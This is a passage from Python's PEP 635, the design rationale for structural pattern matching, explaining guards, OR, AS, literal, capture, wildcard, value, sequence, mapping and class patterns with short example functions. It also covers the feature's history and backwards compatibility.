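
match [1, 2, 3]:
+    case [x, *rest]:
+        pass
+
+print(x, rest)    # 1 [2, 3] -- the bound names remain visible afterwards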

+
+
+

Guards

+

Some constraints cannot be adequately expressed through patterns alone. For instance, a ‘less’ or ‘greater than’ relationship defies the usual ‘equal’ semantics of patterns. Moreover, different subpatterns are independent and cannot refer to each other. The addition of guards addresses these restrictions: a guard is an arbitrary expression attached to a pattern that must evaluate to a “truthy” value for the pattern to succeed.

+

For example, case [x, y] if x < y: uses a guard (if x < y) to +express a ‘less than’ relationship between two otherwise disjoint capture +patterns x and y.

+

From a conceptual point of view, patterns describe structural constraints +on the subject in a declarative style, ideally without any side-effects. +Recall, in particular, that patterns are clearly distinct from expressions, +following different objectives and semantics. Guards then enhance case +blocks in a highly controlled way with arbitrary expressions (that might +have side effects). Splitting the overall functionality into a static structural +and a dynamically evaluated part not only helps with readability, but can +also introduce dramatic potential for compiler optimizations. To keep this +clear separation, guards are only supported on the level of case clauses +and not for individual patterns.

+

Example using guards:

+
def sort(seq):
+    match seq:
+        case [] | [_]:
+            return seq
+        case [x, y] if x <= y:
+            return seq
+        case [x, y]:
+            return [y, x]
+        case [x, y, z] if x <= y <= z:
+            return seq
+        case [x, y, z] if x >= y >= z:
+            return [z, y, x]
+        case [p, *rest]:
+            a = sort([x for x in rest if x <= p])
+            b = sort([x for x in rest if p < x])
+            return a + [p] + b
+
+
+
+
+
+

Patterns

+

Patterns fulfill two purposes: they impose (structural) constraints on +the subject and they specify which data values should be extracted from +the subject and bound to variables. In iterable unpacking, which can be +seen as a prototype to pattern matching in Python, there is only one +structural pattern to express sequences while there is a rich set of +binding patterns to assign a value to a specific variable or field. +Full pattern matching differs from this in that there is more variety +in structural patterns but only a minimum of binding patterns.

+

Patterns differ from assignment targets (as in iterable unpacking) in two ways: they impose additional constraints on the structure of the subject, and a subject may safely fail to match a specific pattern at any point (in iterable unpacking, this constitutes an error). The latter means that patterns should avoid side effects wherever possible.

+

This desire to avoid side effects is one reason why capture patterns +don’t allow binding values to attributes or subscripts: if the +containing pattern were to fail in a later step, it would be hard to +revert such bindings.

+

A cornerstone of pattern matching is the possibility of arbitrarily +nesting patterns. The nesting allows expressing deep +tree structures (for an example of nested class patterns, see the motivation +section above) as well as alternatives.

+

Although patterns might superficially look like expressions, +it is important to keep in mind that there is a clear distinction. In fact, +no pattern is or contains an expression. It is more productive to think of +patterns as declarative elements similar to the formal parameters in a +function definition.

+
+

AS Patterns

+

Patterns fall into two categories: most patterns impose a (structural) +constraint that the subject needs to fulfill, whereas the capture pattern +binds the subject to a name without regard for the subject’s structure or +actual value. Consequently, a pattern can either express a constraint or +bind a value, but not both. AS patterns fill this gap in that they +allow the user to specify a general pattern as well as capture the subject +in a variable.

+

Typical use cases for the AS pattern include OR and Class patterns together with a binding name as in, e.g., case BinOp('+'|'-' as op, ...): or case [int() as first, int() as second]:. The latter could be understood as saying that the subject must fulfill two distinct patterns: [first, second] as well as [int(), int()]. The AS pattern can thus be seen as a special case of an ‘and’ pattern (see OR patterns below for an additional discussion of ‘and’ patterns).

+

In an earlier version, the AS pattern was devised as a ‘Walrus pattern’, +written as case [first:=int(), second:=int()]. However, using as +offers some advantages over :=:

+
    +
  • The walrus operator := is used to capture the result of an expression +on the right hand side, whereas as generally indicates some form of +‘processing’ as in import foo as bar or except E as err:. Indeed, +the pattern P as x does not assign the pattern P to x, but +rather the subject that successfully matches P.
  • +
  • as allows for a more consistent data flow from left to right (the +attributes in Class patterns also follow a left-to-right data flow).
  • +
  • The walrus operator looks very similar to the syntax for matching attributes in the Class pattern, +potentially leading to some confusion.
  • +
+

Example using the AS pattern:

+
def simplify_expr(tokens):
+    match tokens:
+        case [('('|'[') as l, *expr, (')'|']') as r] if (l+r) in ('()', '[]'):
+            return simplify_expr(expr)
+        case [0, ('+'|'-') as op, right]:
+            return UnaryOp(op, right)
+        case [(int() | float() as left) | Num(left), '+', (int() | float() as right) | Num(right)]:
+            return Num(left + right)
+        case [(int() | float()) as value]:
+            return Num(value)
+
+
+
+
+

OR Patterns

+

The OR pattern allows you to combine ‘structurally equivalent’ alternatives +into a new pattern, i.e. several patterns can share a common handler. If any +of an OR pattern’s subpatterns matches the subject, the entire OR +pattern succeeds.

+

Statically typed languages prohibit the binding of names (capture patterns) +inside an OR pattern because of potential conflicts concerning the types of +variables. As a dynamically typed language, Python can be less restrictive +here and allow capture patterns inside OR patterns. However, each subpattern +must bind the same set of variables so as not to leave potentially undefined +names. With two alternatives P | Q, this means that if P binds the +variables u and v, Q must bind exactly the same variables u and v.
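
A minimal sketch of this rule (the command shapes are hypothetical):

def dispatch(command):
+    match command:
+        case ("go", direction) | ("walk", direction):  # both alternatives bind 'direction'
+            return ("moving", direction)
+        case _:
+            return ("ignored",)
+    # A clause such as ("go", direction) | ("quit",) would be rejected at
+    # compile time, because its alternatives bind different sets of names.
+
+print(dispatch(("walk", "north")))   # ('moving', 'north')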

+

There was some discussion on whether to use the bar symbol | or the or +keyword to separate alternatives. The OR pattern does not fully fit +the existing semantics and usage of either of these two symbols. However, +| is the symbol of choice in all programming languages with support of +the OR pattern and is used in that capacity for regular expressions in +Python as well. It is also the traditional separator between alternatives +in formal grammars (including Python’s). +Moreover, | is not only used for bitwise OR, but also +for set unions and dict merging (PEP 584).

+

Other alternatives were considered as well, but none of these would allow +OR-patterns to be nested inside other patterns:

+
    +
  • Using a comma:
    case 401, 403, 404:
    +    print("Some HTTP error")
    +
    +
    +

    This looks too much like a tuple – we would have to find a different way to spell tuples, and the construct would have to be parenthesized inside the argument list of a class pattern. In general, commas already have many different meanings in Python; we shouldn’t add more.

    +
  • +
  • Using stacked cases:
    case 401:
    +case 403:
    +case 404:
    +    print("Some HTTP error")
    +
    +
    +

    This is how this would be done in C, using its fall-through semantics +for cases. However, we don’t want to mislead people into thinking that +match/case uses fall-through semantics (which are a common source of bugs +in C). Also, this would be a novel indentation pattern, which might make +it harder to support in IDEs and such (it would break the simple rule “add +an indentation level after a line ending in a colon”). Finally, this +would not support OR patterns nested inside other patterns, either.

    +
  • +
  • Using “case in” followed by a comma-separated list:
    case in 401, 403, 404:
    +    print("Some HTTP error")
    +
    +
    +

    This would not work for OR patterns nested inside other patterns, like:

    +
    case Point(0|1, 0|1):
    +    print("A corner of the unit square")
    +
    +
    +
  • +
+

AND and NOT Patterns

+

Since this proposal defines an OR-pattern (|) to match one of several alternatives, why not also an AND-pattern (&) or even a NOT-pattern (!), especially given that some other languages (F#, for example) support AND-patterns?

+

However, it is not clear how useful this would be. The semantics for matching +dictionaries, objects and sequences already incorporates an implicit ‘and’: +all attributes and elements mentioned must be present for the match to +succeed. Guard conditions can also support many of the use cases that a +hypothetical ‘and’ operator would be used for.

+

A negation of a match pattern using the operator ! as a prefix +would match exactly if the pattern itself does not match. For +instance, !(3 | 4) would match anything except 3 or 4. +However, there is evidence from other languages that this is +rarely useful, and primarily used as double negation !! to control +variable scopes and prevent variable bindings (which does not apply to +Python). Other use cases are better expressed using guards.

+

In the end, it was decided that this would make the syntax more complex +without adding a significant benefit. It can always be added later.

+

Example using the OR pattern:

+
def simplify(expr):
+    match expr:
+        case ('/', 0, 0):
+            return expr
+        case ('*'|'/', 0, _):
+            return 0
+        case ('+'|'-', x, 0) | ('+', 0, x) | ('*', 1, x) | ('*'|'/', x, 1):
+            return x
+    return expr
+
+
+
+
+

Literal Patterns

+

Literal patterns are a convenient way for imposing constraints on the +value of a subject, rather than its type or structure. They also +allow you to emulate a switch statement using pattern matching.

+

Generally, the subject is compared to a literal pattern by means of standard equality (x == y in Python syntax). Consequently, the literal patterns 1.0 and 1 match exactly the same set of objects, i.e. case 1.0: and case 1: are fully interchangeable. In principle, True would also match the same set of objects because True == 1 holds. However, we believe that many users would be surprised to find that case True: matched the subject 1.0, resulting in some subtle bugs and convoluted workarounds. We therefore adopted the rule that the three singleton patterns None, False and True match by identity (x is y in Python syntax) rather than equality. Hence, case True: will match only True and nothing else. Note that case 1: would still match True, though, because the literal pattern 1 works by equality and not identity.
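
A short sketch of the resulting behavior:

for subject in (True, 1, 1.0):
+    match subject:
+        case True:    # identity check: matches only True itself
+            print(subject, "-> case True")
+        case 1:       # equality check: matches 1 and 1.0 (True was already
+            print(subject, "-> case 1")   # caught by the preceding clause)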

+

Early ideas to induce a hierarchy on numbers so that case 1.0 would +match both the integer 1 and the floating point number 1.0, whereas +case 1: would only match the integer 1 were eventually dropped in +favor of the simpler and more consistent rule based on equality. Moreover, any +additional checks whether the subject is an instance of numbers.Integral +would come at a high runtime cost to introduce what would essentially be +a novel idea in Python. When needed, the explicit syntax case int(1): can +be used.

+

Recall that literal patterns are not expressions, but directly +denote a specific value. From a pragmatic point of view, we want to +allow using negative and even complex values as literal patterns, but +they are not atomic literals (only unsigned real and imaginary numbers +are). E.g., -3+4j is syntactically an expression of the form +BinOp(UnaryOp('-', 3), '+', 4j). Since expressions are not part +of patterns, we had to add explicit syntactic support for such values +without having to resort to full expressions.

+

Interpolated f-strings, on the other hand, are not literal values, despite their appearance, and can therefore not be used as literal patterns (string concatenation, however, is supported).

+

Literal patterns not only occur as patterns in their own right, but also +as keys in mapping patterns.

+

Range matching patterns. +This would allow patterns such as 1...6. However, there are a host of +ambiguities:

+
    +
  • Is the range open, half-open, or closed? (I.e. is 6 included in the +above example or not?)
  • +
  • Does the range match a single number, or a range object?
  • +
  • Range matching is often used for character ranges (‘a’…’z’) but that +won’t work in Python since there’s no character data type, just strings.
  • +
  • Range matching can be a significant performance optimization if you can +pre-build a jump table, but that’s not generally possible in Python due +to the fact that names can be dynamically rebound.
  • +
+

Rather than creating a special-case syntax for ranges, it was decided +that allowing custom pattern objects (InRange(0, 6)) would be more flexible +and less ambiguous; however those ideas have been postponed for the time +being.

+

Example using Literal patterns:

+
def simplify(expr):
+    match expr:
+        case ('+', 0, x):
+            return x
+        case ('+' | '-', x, 0):
+            return x
+        case ('and', True, x):
+            return x
+        case ('and', False, x):
+            return False
+        case ('or', False, x):
+            return x
+        case ('or', True, x):
+            return True
+        case ('not', ('not', x)):
+            return x
+    return expr
+
+
+
+
+

Capture Patterns

+

Capture patterns take on the form of a name that accepts any value and binds +it to a (local) variable (unless the name is declared as nonlocal or +global). In that sense, a capture pattern is similar +to a parameter in a function definition (when the function is called, each +parameter binds the respective argument to a local variable in the function’s +scope).

+

A name used for a capture pattern must not coincide with another capture +pattern in the same pattern. This, again, is similar to parameters, which +equally require each parameter name to be unique within the list of +parameters. It differs, however, from iterable unpacking assignment, where +the repeated use of a variable name as target is permissible (e.g., +x, x = 1, 2). The rationale for not supporting (x, x) in patterns +is its ambiguous reading: it could be seen as in iterable unpacking where +only the second binding to x survives. But it could be equally seen as +expressing a tuple with two equal elements (which comes with its own issues). +Should the need arise, then it is still possible to introduce support for +repeated use of names later on.

+

There were calls to explicitly mark capture patterns and thus identify them +as binding targets. According to that idea, a capture pattern would be +written as, e.g. ?x, $x or =x. The aim of such explicit capture +markers is to let an unmarked name be a value pattern (see below). +However, this is based on the misconception that pattern matching was an +extension of switch statements, placing the emphasis on fast switching based +on (ordinal) values. Such a switch statement has indeed been proposed for +Python before (see PEP 275 and PEP 3103). Pattern matching, on the other +hand, builds a generalized concept of iterable unpacking. Binding values +extracted from a data structure is at the very core of the concept and hence +the most common use case. Explicit markers for capture patterns would thus +betray the objective of the proposed pattern matching syntax and simplify +a secondary use case at the expense of additional syntactic clutter for +core cases.

+

It has been proposed that capture patterns are not needed at all, +since the equivalent effect can be obtained by combining an AS +pattern with a wildcard pattern (e.g., case _ as x is equivalent +to case x). However, this would be unpleasantly verbose, +especially given that we expect capture patterns to be very common.

+

Example using Capture patterns:

+
def average(*args):
+    match args:
+        case [x, y]:           # captures the two elements of a sequence
+            return (x + y) / 2
+        case [x]:              # captures the only element of a sequence
+            return x
+        case []:
+            return 0
+        case a:                # captures the entire sequence
+            return sum(a) / len(a)
+
+
+
+
+

Wildcard Pattern

+

The wildcard pattern is a special case of a ‘capture’ pattern: it accepts +any value, but does not bind it to a variable. The idea behind this rule +is to support repeated use of the wildcard in patterns. While (x, x) +is an error, (_, _) is legal.

+

Particularly in larger (sequence) patterns, it is important to allow the +pattern to concentrate on values with actual significance while ignoring +anything else. Without a wildcard, it would become necessary to ‘invent’ +a number of local variables, which would be bound but never used. Even +when sticking to naming conventions and using e.g. _1, _2, _3 to name +irrelevant values, say, this still introduces visual clutter and can hurt +performance (compare the sequence pattern (x, y, *z) to (_, y, *_), +where the *z forces the interpreter to copy a potentially very long +sequence, whereas the second version simply compiles to code along the +lines of y = seq[1]).

+

There has been much discussion about the choice of the underscore _ as a wildcard pattern, i.e. making this one name non-binding. However, the underscore is already heavily used as an ‘ignore value’ marker in iterable unpacking. Since the wildcard pattern _ never binds, this use of the underscore does not interfere with other uses such as inside the REPL or the gettext module.

+

It has been proposed to use ... (i.e., the ellipsis token) or * +(star) as a wildcard. However, both these look as if an arbitrary number +of items is omitted:

+
case [a, ..., z]: ...
+case [a, *, z]: ...
+
+
+

Either example looks like it would match a sequence of two or more +items, capturing the first and last values. While that may be the +ultimate “wildcard”, it does not convey the desired semantics.

+

An alternative that does not suggest an arbitrary number of items +would be ?. This is even being proposed independently from +pattern matching in PEP 640. We feel however that using ? as a +special “assignment” target is likely more confusing to Python users +than using _. It violates Python’s (admittedly vague) principle +of using punctuation characters only in ways similar to how they are +used in common English usage or in high school math, unless the usage +is very well established in other programming languages (like, e.g., +using a dot for member access).

+

The question mark fails on both counts: its use in other programming +languages is a grab-bag of usages only vaguely suggested by the idea +of a “question”. For example, it means “any character” in shell +globbing, “maybe” in regular expressions, “conditional expression” in +C and many C-derived languages, “predicate function” in Scheme, +“modify error handling” in Rust, “optional argument” and “optional +chaining” in TypeScript (the latter meaning has also been proposed for +Python by PEP 505). An as yet unnamed PEP proposes it to mark +optional types, e.g. int?.

+

Another common use of ? in programming systems is “help”, for +example, in IPython and Jupyter Notebooks and many interactive +command-line utilities.

+

In addition, this would put Python in a rather unique position: the underscore is used as a wildcard pattern in every programming language with pattern matching that we could find (including C#, Elixir, Erlang, F#, Grace, Haskell, Mathematica, OCaml, Ruby, Rust, Scala, Swift, and Thorn). Keeping in mind that many users of Python also work with other programming languages, have prior experience when learning Python, and may move on to other languages after having learned Python, we find that such well-established standards are important and relevant with respect to readability and learnability. In our view, concerns that this wildcard would give a regular name special treatment are not strong enough to introduce syntax that would make Python special.

+

Else blocks. A case block without a guard whose pattern is a single +wildcard (i.e., case _:) accepts any subject without binding it to +a variable or performing any other operation. It is thus semantically +equivalent to else:, if it were supported. However, adding such +an else block to the match statement syntax would not remove the need +for the wildcard pattern in other contexts. Another argument against +this is that there would be two plausible indentation levels for an +else block: aligned with case or aligned with match. The +authors have found it quite contentious which indentation level to +prefer.

+

Example using the Wildcard pattern:

+
def is_closed(sequence):
+    match sequence:
+        case [_]:               # any sequence with a single element
+            return True
+        case [start, *_, end]:  # a sequence with at least two elements
+            return start == end
+        case _:                 # anything
+            return False
+
+
+
+
+

Value Patterns

+

It is good programming style to use named constants for parametric values or +to clarify the meaning of particular values. Clearly, it would be preferable +to write case (HttpStatus.OK, body): over +case (200, body):, for example. The main issue that arises here is how to +distinguish capture patterns (variable bindings) from value patterns. The +general discussion surrounding this issue has brought forward a plethora of +options, which we cannot all fully list here.

+

Strictly speaking, value patterns are not really necessary, but +could be implemented using guards, i.e. +case (status, body) if status == HttpStatus.OK:. Nonetheless, the +convenience of value patterns is unquestioned and obvious.

+

The observation that constants tend to be written in uppercase letters or collected in enumeration-like namespaces suggests possible rules to discern constants syntactically. However, the idea of using upper- vs. lowercase as a marker has been met with scepticism since there is no similar precedent in core Python (although it is common in other languages). We therefore only adopted the rule that any dotted name (i.e., attribute access) is to be interpreted as a value pattern, for example HttpStatus.OK above. This precludes, in particular, local variables and global variables defined in the current module from acting as constants.

+

A proposed rule to use a leading dot (e.g. +.CONSTANT) for that purpose was criticised because it was felt that the +dot would not be a visible-enough marker for that purpose. Partly inspired +by forms found in other programming languages, a number of different +markers/sigils were proposed (such as ^CONSTANT, $CONSTANT, +==CONSTANT, CONSTANT?, or the word enclosed in backticks), although +there was no obvious or natural choice. The current proposal therefore +leaves the discussion and possible introduction of such a ‘constant’ marker +for a future PEP.

+

Distinguishing the semantics of names based on whether a name is a global variable (i.e. the compiler would treat global variables as constants rather than capture patterns) leads to various issues. The addition or alteration of a global variable in the module could have unintended side effects on patterns. Moreover, pattern matching could not be used directly inside a module’s scope because all variables would be global, making capture patterns impossible.

+

Example using the Value pattern:

+
def handle_reply(reply):
+    match reply:
+        case (HttpStatus.OK, MimeType.TEXT, body):
+            process_text(body)
+        case (HttpStatus.OK, MimeType.APPL_ZIP, body):
+            text = deflate(body)
+            process_text(text)
+        case (HttpStatus.MOVED_PERMANENTLY, new_URI):
+            resend_request(new_URI)
+        case (HttpStatus.NOT_FOUND):
+            raise ResourceNotFound()
+
+
+
+
+

Group Patterns

+

Allowing users to explicitly specify the grouping is particularly helpful in the case of OR patterns.

+
+
+

Sequence Patterns

+

Sequence patterns follow as closely as possible the already established +syntax and semantics of iterable unpacking. Of course, subpatterns take +the place of assignment targets (variables, attributes and subscript). +Moreover, the sequence pattern only matches a carefully selected set of +possible subjects, whereas iterable unpacking can be applied to any +iterable.

+
    +
  • As in iterable unpacking, we do not distinguish between ‘tuple’ and +‘list’ notation. [a, b, c], (a, b, c) and a, b, c are all +equivalent. While this means we have a redundant notation and checking +specifically for lists or tuples requires more effort (e.g. +case list([a, b, c])), we mimic iterable unpacking as much as +possible.
  • +
  • A starred pattern will capture a sub-sequence of arbitrary length, +again mirroring iterable unpacking. Only one starred item may be +present in any sequence pattern. In theory, patterns such as (*_, 3, *_) +could be understood as expressing any sequence containing the value 3. +In practice, however, this would only work for a very narrow set of use +cases and lead to inefficient backtracking or even ambiguities otherwise.
  • +
  • The sequence pattern does not iterate through an iterable subject. All +elements are accessed through subscripting and slicing, and the subject must +be an instance of collections.abc.Sequence. This includes, of course, +lists and tuples, but excludes e.g. sets and dictionaries. While it would +include strings and bytes, we make an exception for these (see below).
  • +
+

A sequence pattern cannot just iterate through any iterable object. The +consumption of elements from the iteration would have to be undone if the +overall pattern fails, which is not feasible.

+

To identify sequences we cannot rely on len() and subscripting and slicing alone, because sequences share these protocols with mappings (e.g. dict) in this regard. It would be surprising if a sequence pattern also matched dictionaries or other objects implementing the mapping protocol (i.e. __getitem__). The interpreter therefore performs an instance check to ensure that the subject in question really is a sequence (of known type). (As an optimization of the most common case, if the subject is exactly a list or a tuple, the instance check can be skipped.)

+

String and bytes objects have a dual nature: they are both ‘atomic’ objects +in their own right, as well as sequences (with a strongly recursive nature +in that a string is a sequence of strings). The typical behavior and use +cases for strings and bytes are different enough from those of tuples and +lists to warrant a clear distinction. It is in fact often unintuitive and +unintended that strings pass for sequences, as evidenced by regular questions +and complaints. Strings and bytes are therefore not matched by a sequence +pattern, limiting the sequence pattern to a very specific understanding of +‘sequence’. The built-in bytearray type, being a mutable version of +bytes, also deserves an exception; but we don’t intend to +enumerate all other types that may be used to represent bytes +(e.g. some, but not all, instances of memoryview and array.array).
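
A minimal sketch of which subjects a sequence pattern accepts:

def pair(subject):
+    match subject:
+        case [x, y]:
+            return (x, y)
+    return None
+
+print(pair([1, 2]))            # (1, 2)
+print(pair((1, 2)))            # (1, 2) -- list and tuple notation are equivalent
+print(pair("ab"))              # None -- strings are deliberately excluded
+print(pair({0: "a", 1: "b"}))  # None -- mappings never match sequence patterns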

+
+
+

Mapping Patterns

+

Dictionaries or mappings in general are one of the most important and most +widely used data structures in Python. In contrast to sequences, mappings +are built for fast direct access to arbitrary elements identified by a key. +In most cases an element is retrieved from a dictionary by a known key +without regard for any ordering or other key-value pairs stored in the same +dictionary. Particularly common are string keys.

+

The mapping pattern reflects the common usage of dictionary lookup: it allows +the user to extract some values from a mapping by means of constant/known +keys and have the values match given subpatterns. +Extra keys in the subject are ignored even if **rest is not present. +This is different from sequence patterns, where extra items will cause a +match to fail. But mappings are actually different from sequences: they +have natural structural sub-typing behavior, i.e., passing a dictionary +with extra keys somewhere will likely just work. +Should it be +necessary to impose an upper bound on the mapping and ensure that no +additional keys are present, then the usual double-star-pattern **rest +can be used. The special case **_ with a wildcard, however, is not +supported as it would not have any effect, but might lead to an incorrect +understanding of the mapping pattern’s semantics.

+

To avoid overly expensive matching algorithms, keys must be literals or +value patterns.

+

There is a subtle reason for using get(key, default) instead of __getitem__(key) followed by a check for KeyError: if the subject happens to be a defaultdict, calling __getitem__ for a non-existent key would add the key. Using get() avoids this unexpected side effect.

+

Example using the Mapping pattern:

+
def change_red_to_blue(json_obj):
+    match json_obj:
+        case { 'color': ('red' | '#FF0000') }:
+            json_obj['color'] = 'blue'
+        case { 'children': children }:
+            for child in children:
+                change_red_to_blue(child)
+
+
+
+
+

Class Patterns

+

Class patterns fulfill two purposes: checking whether a given subject is +indeed an instance of a specific class, and extracting data from specific +attributes of the subject. Anecdotal evidence revealed that isinstance() +is one of the most often used functions in Python in terms of +static occurrences in programs. Such instance checks typically precede +a subsequent access to information stored in the object, or a possible +manipulation thereof. A typical pattern might be along the lines of:

+
def traverse_tree(node):
+    if isinstance(node, Node):
+        traverse_tree(node.left)
+        traverse_tree(node.right)
+    elif isinstance(node, Leaf):
+        print(node.value)
+
+
+

In many cases class patterns occur nested, as in the example +given in the motivation:

+
if (isinstance(node, BinOp) and node.op == "+"
+        and isinstance(node.right, BinOp) and node.right.op == "*"):
+    a, b, c = node.left, node.right.left, node.right.right
+    # Handle a + b*c
+
+
+

The class pattern lets you concisely specify both an instance check +and relevant attributes (with possible further constraints). It is +thereby very tempting to write, e.g., case Node(left, right): in the +first case above and case Leaf(value): in the second. While this +indeed works well for languages with strict algebraic data types, it is +problematic with the structure of Python objects.

+

When dealing with general Python objects, we face a potentially very large +number of unordered attributes: an instance of Node contains a large +number of attributes (most of which are ‘special methods’ such as +__repr__). Moreover, the interpreter cannot reliably deduce the +ordering of attributes. For an object that +represents a circle, say, there is no inherently obvious ordering of the +attributes x, y and radius.

+

We envision two possibilities for dealing with this issue: either explicitly name the attributes of interest, or provide an additional mapping that tells the interpreter which attributes to extract and in which order. Both approaches are supported (and both are illustrated in the sketch after the list below). Moreover, explicitly naming the attributes of interest lets you further specify the required structure of an object; if an object lacks an attribute specified by the pattern, the match fails.

+
    +
  • Attributes that are explicitly named pick up the syntax of named arguments. +If an object of class Node has two attributes left and right +as above, the pattern Node(left=x, right=y) will extract the values of +both attributes and assign them to x and y, respectively. The data +flow from left to right seems unusual, but is in line with mapping patterns +and has precedents such as assignments via as in with- or +import-statements (and indeed AS patterns).

    Naming the attributes in question explicitly will be mostly used for more +complex cases where the positional form (below) is insufficient.

    +
  • +
  • The class field __match_args__ specifies a number of attributes +together with their ordering, allowing class patterns to rely on positional +sub-patterns without having to explicitly name the attributes in question. +This is particularly handy for smaller objects or instances of data classes, +where the attributes of interest are rather obvious and often have a +well-defined ordering. In a way, __match_args__ is similar to the +declaration of formal parameters, which allows calling functions with +positional arguments rather than naming all the parameters.

    This is a class attribute, because it needs to be looked up on the class +named in the class pattern, not on the subject instance.

    +
  • +
+
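
Both forms can be sketched with a small hypothetical Node class:

class Node:
+    __match_args__ = ("left", "right")   # ordering for positional class patterns
+    def __init__(self, left, right):
+        self.left = left
+        self.right = right
+
+match Node(1, 2):
+    case Node(left=l, right=r):   # attributes named explicitly
+        print(l, r)               # 1 2
+
+match Node(3, 4):
+    case Node(l, r):              # positional form, converted via __match_args__
+        print(l, r)               # 3 4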

The syntax of class patterns is based on the idea that de-construction mirrors the syntax of construction. This is already the case in virtually any Python construct, be it assignment targets, function definitions or iterable unpacking. In all these cases, we find that the syntax for sending and that for receiving ‘data’ are virtually identical.

+
    +
  • Assignment targets such as variables, attributes and subscripts: +foo.bar[2] = foo.bar[3];
  • +
  • Function definitions: a function defined with def foo(x, y, z=6) +is called as, e.g., foo(123, y=45), where the actual arguments +provided at the call site are matched against the formal parameters +at the definition site;
  • +
  • Iterable unpacking: a, b = b, a or [a, b] = [b, a] or +(a, b) = (b, a), just to name a few equivalent possibilities.
  • +
+

Using the same syntax for reading and writing, l- and r-values, or +construction and de-construction is widely accepted for its benefits in +thinking about data, its flow and manipulation. This equally extends to +the explicit construction of instances, where class patterns C(p, q) +deliberately mirror the syntax of creating instances.

+

The special case for the built-in classes bool, bytearray +etc. (where e.g. str(x) captures the subject value in x) can +be emulated by a user-defined class as follows:

+
class MyClass:
+    __match_args__ = ("__myself__",)
+    __myself__ = property(lambda self: self)
+
+
+

Type annotations for pattern variables. +The proposal was to combine patterns with type annotations:

+
match x:
+    case [a: int, b: str]: print(f"An int {a} and a string {b}:")
+    case [a: int, b: int, c: int]: print("Three ints", a, b, c)
+    ...
+
+
+

This idea has a lot of problems. For one, the colon can only +be used inside of brackets or parentheses, otherwise the syntax becomes +ambiguous. And because Python disallows isinstance() checks +on generic types, type annotations containing generics will not +work as expected.
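
+

The isinstance() restriction is easy to demonstrate; the following is a minimal illustration, not part of the original proposal:

+
isinstance([1, 2], list)           # fine: True
+try:
+    isinstance([1, 2], list[int])
+except TypeError as exc:
+    print(exc)                     # isinstance() argument 2 cannot be a parameterized generic
+
+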

+
+
+
+
+

History and Context

+

Pattern matching emerged in the late 1970s in the form of tuple unpacking +and as a means to handle recursive data structures such as linked lists or +trees (object-oriented languages usually use the visitor pattern for handling +recursive data structures). The early proponents of pattern matching +organised structured data in ‘tagged tuples’ rather than struct as in +C or the objects introduced later. A node in a binary tree would, for +instance, be a tuple with two elements for the left and right branches, +respectively, and a Node tag, written as Node(left, right). In +Python we would probably put the tag inside the tuple as +('Node', left, right) or define a data class Node to achieve the +same effect.

+

Using modern syntax, a depth-first tree traversal would then be written as +follows:

+
def traverse(node):
+    match node:
+        case Node(left, right):
+            traverse(left)
+            traverse(right)
+        case Leaf(value):
+            handle(value)
+
+
+

The notion of handling recursive data structures with pattern matching +immediately gave rise to the idea of handling more general recursive +‘patterns’ (i.e. recursion beyond recursive data structures) +with pattern matching. Pattern matching would thus also be used to define +recursive functions such as:

+
def fib(arg):
+    match arg:
+        case 0:
+            return 1
+        case 1:
+            return 1
+        case n:
+            return fib(n-1) + fib(n-2)
+
+
+

As pattern matching was repeatedly integrated into new and emerging +programming languages, its syntax slightly evolved and expanded. The +first two cases in the fib example above could be written more succinctly +as case 0 | 1: with | denoting alternative patterns. Moreover, the +underscore _ was widely adopted as a wildcard, a filler where neither +the structure nor value of parts of a pattern were of substance. Since the +underscore is already frequently used in equivalent capacity in Python’s +iterable unpacking (e.g., _, _, third, *_ = something) we kept these +universal standards.
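
+

As an illustration (a sketch, not text from the original document), the fib function above condenses accordingly:

+
def fib(arg):
+    match arg:
+        case 0 | 1:
+            return 1
+        case n:
+            return fib(n - 1) + fib(n - 2)
+
+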

+

It is noteworthy that the concept of pattern matching has always been +closely linked to the concept of functions. The different case clauses +have always been considered as something like semi-independent functions +where pattern variables take on the role of parameters. This becomes +most apparent when pattern matching is written as an overloaded function, +along the lines of (Standard ML):

+
fun fib 0 = 1
+  | fib 1 = 1
+  | fib n = fib (n-1) + fib (n-2)
+
+
+

Even though such a strict separation of case clauses into independent +functions does not apply in Python, we find that patterns share many +syntactic rules with parameters, such as binding arguments to unqualified +names only or that variable/parameter names must not be repeated for +a particular pattern/function.

+

With its emphasis on abstraction and encapsulation, object-oriented +programming posed a serious challenge to pattern matching. In short: in +object-oriented programming, we can no longer view objects as tagged tuples. +The arguments passed into the constructor do not necessarily specify the +attributes or fields of the objects. Moreover, there is no longer a strict +ordering of an object’s fields and some of the fields might be private and +thus inaccessible. And on top of this, the given object might actually be +an instance of a subclass with slightly different structure.

+

To address this challenge, patterns became increasingly independent of the +original tuple constructors. In a pattern like Node(left, right), +Node is no longer a passive tag, but rather a function that can actively +check for any given object whether it has the right structure and extract a +left and right field. In other words: the Node-tag becomes a +function that transforms an object into a tuple or returns some failure +indicator if it is not possible.

+

In Python, we simply use isinstance() together with the __match_args__ +field of a class to check whether an object has the correct structure and +then transform some of its attributes into a tuple. For the Node example +above, for instance, we would have __match_args__ = ('left', 'right') to +indicate that these two attributes should be extracted to form the tuple. +That is, case Node(x, y) would first check whether a given object is an +instance of Node and then assign left to x and right to y, +respectively.

+

Paying tribute to Python’s dynamic nature with ‘duck typing’, however, we +also added a more direct way to specify the presence of, or constraints on +specific attributes. Instead of Node(x, y) you could also write +object(left=x, right=y), effectively eliminating the isinstance() +check and thus supporting any object with left and right attributes. +Or you would combine these ideas to write Node(right=y) so as to require +an instance of Node but only extract the value of the right attribute.
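
+

The following self-contained sketch pulls these ideas together; the Node class here is hypothetical and defined only for this illustration:

+
class Node:
+    __match_args__ = ('left', 'right')
+    def __init__(self, left, right):
+        self.left = left
+        self.right = right
+
+match Node(1, 2):
+    case Node(x, y):               # isinstance() check, then positional extraction
+        print(x, y)                # 1 2
+
+match Node(1, 2):
+    case object(left=x, right=y):  # duck typing: any object with these attributes
+        print(x, y)                # 1 2
+
+match Node(1, 2):
+    case Node(right=y):            # instance check, but extract only 'right'
+        print(y)                   # 2
+
+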

+
+
+

Backwards Compatibility

+

Through its use of “soft keywords” and the new PEG parser (PEP 617), +the proposal remains fully backwards compatible. However, 3rd party +tooling that uses an LL(1) parser to parse Python source code may be +forced to switch parser technology to be able to support those same +features.

+
+
+

Security Implications

+

We do not expect any security implications from this language feature.

+
+
+

Reference Implementation

+

A feature-complete CPython implementation is available on +GitHub.

+

An interactive playground +based on the above implementation was created using Binder [2] and Jupyter [3].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0635.rst

+

Last modified: 2024-07-24 22:56:04 GMT

+ +
+ +
